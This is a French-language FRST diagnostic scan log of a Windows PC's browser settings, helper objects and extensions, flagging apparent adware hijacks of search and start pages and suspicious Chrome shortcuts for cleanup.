Tcpip\..\Interfaces\{25F21A04-496A-486E-B7EF-BCA67E497234}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{57054E79-181C-49B1-A338-5D6100939F1C}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{6E78D00F-6396-4B3D-AB08-10811C20830E}: [DhcpNameServer] 10.111.166.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056251301&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056257360&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {2B5F0F25-5F7C-49BD-A1F2-75D620BC58A0} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H2Kzamobl7428xAU,5288a185-ab92-4e3c-adf8-aacc1557d732,
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-04] (HP Inc.)
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2015-08-09] (IvoSoft)
BHO-x32: Aide pour le lien d'Adobe PDF Reader -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-22] (Adobe Systems Incorporated)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-07-25] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-04] (HP Inc.)
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)
FireFox:
========
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default [2018-04-27]
FF Homepage: Mozilla\Firefox\Profiles\0nvqk2dc.default -> hxxps://www.google.com/?bcutc=sp-006
FF NewTab: Mozilla\Firefox\Profiles\0nvqk2dc.default -> about:newtab
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-01-27] [Legacy]
FF Extension: (Firefox Hotfix) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-11-26] [Legacy]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\google-avast.xml [2018-03-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\ourluckysites.xml [2017-05-31]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-03-31]
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default [2017-09-26] <==== ATTENTION
FF Homepage: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www.searchinme.com/
FF NewTab: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h2kzamobl7428xau,5288a185-ab92-4e3c-adf8-aacc1557d732,
FF NetworkProxy: Firefox\Firefox\Profiles\0nvqk2dc.default -> autoconfig_url", "data:text/javascript,%2F*windscribe*%2Ffunction%20FindProxyForURL(url%2C%20host)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(isPlainHostName(host)%20%7C%7C%20%20shExpMatch(host%2C%20%22*.local%22)%20%7C%7C%20shExpMatch(host%2C%20%22*.int%22)%20%7C%7C%20shExpMatch(url%2C%20%22*%3A%2F%2Fapi.windscribe.com%2F*%22))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20lanIps%20%3D%20%2F(%5E127.)%7C(%5E192.168.)%7C(%5E10.)%7C(%5E172.1%5B6-9%5D.)%7C(%5E172.2%5B0-9%5D.)%7C(%5E172.3%5B0-1%5D.)%2F%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(lanIps.test(host))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(url.substring(0%2C%205)%20%3D%3D%20'http%3A'%20%7C%7C%20url.substring(0%2C%206)%20%3D%3D%20'https%3A'%20%7C%7C%20url.substring(0%2C%204)%20%3D%3D%20'ftp%3A'%20%7C%7C%20url.substring(0%2C%203)%20%3D%3D%20'ws%3A')%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22HTTPS%20ext-start.windscribe.com%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20'DIRECT'%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D"
FF Extension: (SimilarWeb) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-29] [Legacy] [non signé]
FF Extension: (FF Adr) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-29] [non signé]
FF Extension: (Windscribe) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@windscribeff.xpi [2017-06-22] [Legacy]
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-02-22] [Legacy]
FF Extension: (Français Language Pack) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-05-19] [Legacy] [non signé]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startsearch.xml [2017-05-19]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2016-03-24] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-18] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()
FF Plugin-x32: TorchVLC -> C:\Users\pc1\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [Pas de fichier]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\29514203.js [2017-01-27] <==== ATTENTION (Pointe vers un fichier *.cfg)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\29514203.cfg [2017-01-27] <==== ATTENTION
Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default [2017-01-27]
CHR Extension: (Google Slides) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-08]
CHR Extension: (Google Docs) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-08]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-01]
CHR Extension: (Recherche Google) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (ZenMate VPN - Sécurité internet & Unblock) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2016-12-06]
CHR Extension: (Google Sheets) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-08]
CHR Extension: (Google Docs hors connexion) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-01]
CHR Extension: (Skype) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-12-06]
CHR Extension: (Kaspersky Protection) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpeeaghdjmhlakojjcgfdhgcejdaefmi [2017-01-27]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Fast search) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-01-27]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-08]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-01-21]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-05-29]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-19]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-19]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-09]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-19]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-10]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-26]
CHR Extension: (Google Drive) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-07-17]
CHR Extension: (Touch VPN) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2018-07-17]
CHR Extension: (YouTube) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-07-17]
CHR Extension: (Gmail) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-07-17]
CHR Extension: (Chrome Media Router) - C:\Users\pc1\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-07-17]
CHR Profile: C:\Users\pc1\AppData\Local\Google\Chrome\User Data\System Profile [2018-07-17]
CHR HKU\S-1-5-21-813913080-1538114768-4122880109-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Fanlook\Application\chrome.exe (Google Inc.) <==== ATTENTION
Opera:
=======
OPR Extension: (Proxy SurfEasy, une Société d'Opera Software) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\ebpielhlnnpkiddeeacoephkilopgblc [2017-07-05]
OPR Extension: (SaveFrom.net helper) - C:\Users\pc1\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2018-03-20]
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-04-03] (Apple Inc.)
